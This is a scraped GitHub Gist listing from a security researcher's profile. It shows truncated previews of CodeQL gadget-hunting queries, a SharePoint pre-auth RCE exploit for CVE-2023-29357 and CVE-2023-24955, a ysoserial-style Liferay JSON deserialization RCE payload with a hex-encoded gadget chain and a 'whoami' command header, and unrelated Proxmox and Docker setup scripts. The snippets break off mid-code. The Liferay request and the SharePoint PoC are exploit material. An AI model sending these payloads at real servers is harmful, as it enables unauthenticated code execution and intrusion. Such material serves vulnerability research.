Skip to content

Instantly share code, notes, and snippets.

/**
* @kind path-problem
*/
import csharp
class StartMethod extends Getter {
StartMethod() { getName() = "get_Name" }
}
/**
* @kind path-problem
*/
import csharp
class ODPSetter extends Setter {
ODPSetter() {
getDeclaringType().getName() = "ObjectDataProvider" and
getName() = "set_ObjectInstance"
/**
* @kind path-problem
*/
import java
class CustomSetterMethod extends Method {
CustomSetterMethod() {
getName().matches("set%") and
not getName().length() = 3 and
POST /api/setup/validate HTTP/1.1
Host: localhost:3000
Content-Length: 416
Accept: application/json
Content-Type: application/json
User-Agent: Mozilla/5.0
Connection: close
{"token":"d66c72f1-ddf7-4d55-aaff-53ffbd4fbb7b","details":{"details":{
"subprotocol":"h2",
@testanull
testanull / SharePwn_public.py
Created December 15, 2023 07:31
SharePoint Pre-Auth Code Injection RCE chain CVE-2023-29357 & CVE-2023-24955 PoC
# -*- coding: utf-8 -*-
import hashlib
import base64
import requests, string, struct, uuid, random, re
import sys
from collections import OrderedDict
from sys import version
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# too lazy to deal with string <-> bytes confusion in python3 so forget it ¯\_(ツ)_/¯
@testanull
testanull / prepare_ubuntu_template.sh
Created December 28, 2023 04:11 — forked from reluce/prepare_ubuntu_template.sh
Prepare Ubuntu 22.04 Cloud Image and Template for Proxmox
# All commands will be executed on a Proxmox host
sudo apt update -y && sudo apt install libguestfs-tools -y
wget https://cloud-images.ubuntu.com/jammy/current/jammy-server-cloudimg-amd64.img
# Install qemu-guest-agent on the image. Additional packages can be specified by separating with a comma.
sudo virt-customize -a jammy-server-cloudimg-amd64.img --install qemu-guest-agent
# Read and set root user password from file.
sudo virt-customize -a jammy-server-cloudimg-amd64.img --root-password file:password_root.txt
# Create an additional user.
sudo virt-customize -a jammy-server-cloudimg-amd64.img --run-command "useradd -m -s /bin/bash myuser"
# Set password for that user.
@testanull
testanull / LiferayJsonEvalCC6.java
Created March 27, 2020 09:18
Liferay Json Deserialize 1 hit RCE
package ysoserial.payloads;
import com.mchange.lang.ByteUtils;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import ysoserial.payloads.annotation.Authors;
POST /api/jsonws/invoke HTTP/1.1
Host: <Host>
Connection: close
cmd2: whoami
Content-Type: application/x-www-form-urlencoded
Content-Length: 4912
cmd={"/expandocolumn/update-column":{}}&p_auth=<valid token>&formDate=<date>&columnId=123&name=asdasd&type=1&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:ACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73
import requests
import random
import string
import sys
import time
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
@testanull
testanull / install.sh
Created September 7, 2023 02:53
Install docker && docker-compose on Ubuntu 20.04
#!/bin/bash
sudo su
wget -qO- https://get.docker.com/ | sh
COMPOSE_VERSION=`git ls-remote https://github.com/docker/compose | grep refs/tags | grep -oE "[0-9]+\.[0-9][0-9]+\.[0-9]+$" | sort --version-sort | tail -n 2 | head -n 1`
sudo sh -c "curl -L https://github.com/docker/compose/releases/download/v${COMPOSE_VERSION}/docker-compose-`uname -s`-`uname -m` > /usr/local/bin/docker-compose"
sudo chmod +x /usr/local/bin/docker-compose
# You're good to go, no more 404 not found!